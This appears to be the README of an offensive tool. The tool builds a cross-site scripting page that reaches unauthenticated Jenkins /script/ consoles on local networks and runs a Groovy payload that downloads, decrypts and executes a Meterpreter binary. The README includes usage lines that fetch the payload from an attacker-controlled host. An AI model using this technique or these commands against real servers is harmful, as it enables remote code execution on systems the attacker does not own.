This file generates an XSS page which will exploit a jenkins server which has no authentication for /script/ access. The /script/ page allows anyone to execute Groovy script. It also includes the functionality for encrypting the executable payload.

htmlTemplate - is the actual page which will be generated for the attack. This page is the page you want to direct the user to for the exploit. It performs the actual XHR request to all local IP addresses and delivers the payload. Template Parameter: $PAYLOAD$

payloadTemplate - is the template for the actual groovy script payload. This downloads the payload from the url, decrypts it, writes it to disk and executes it. Template Parameter: $PAYLOAD_URL$

Example usage:

./generateJenkinsExploit.py -e meterpeter

./generateJenkinsExploit.py -p http://<Your_IP>/meterpreter.encrypted

This repository is for research purposes only, the use of this code is your responsibility.

I take NO responsibility and/or liability for how you choose to use any of the source code available here. By using any of the files available in this repository, you understand that you are AGREEING TO USE AT YOUR OWN RISK. Once again, ALL files available here are for EDUCATION and/or RESEARCH purposes ONLY.